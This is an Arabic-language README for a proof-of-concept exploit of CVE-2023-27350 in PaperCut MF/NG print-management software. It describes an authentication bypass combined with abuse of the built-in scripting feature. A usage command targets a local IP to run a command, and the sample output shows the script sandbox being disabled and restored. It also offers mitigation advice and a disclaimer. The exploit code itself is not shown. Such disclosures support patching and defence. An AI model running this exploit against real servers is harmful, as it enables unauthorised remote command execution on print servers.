
ثغرة Papercut، الإصدارات المتأثرة هي PaperCut MF أو NG الإصدار 8.0 أو أحدث (باستثناء الإصدارات المُصحَّحة) على جميع منصات أنظمة التشغيل.
POC لـ CVE-2023-27350 الذي يؤثر على PaperCut MF/NG
##الإصدارات المتأثرة 'PaperCut MF أو NG الإصدار 8.0 أو أحدث (باستثناء الإصدارات المصلحة) على جميع أنظمة التشغيل.'
##الملخص يستخدم هذا POC ثغرة تجاوز المصادقة مقترنة بإساءة استخدام وظيفة البرمجة النصية المدمجة لتنفيذ الأوامر.
##الاستخدام
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
##التخفيفات قم بالتحديث إلى أحدث إصدار أو قم بالتخفيف باتباع التعليمات الواردة في التنبيه الأمني من PaperCut
##إخلاء المسؤولية تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الأماكن المصرح بها صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدم بمسؤولية.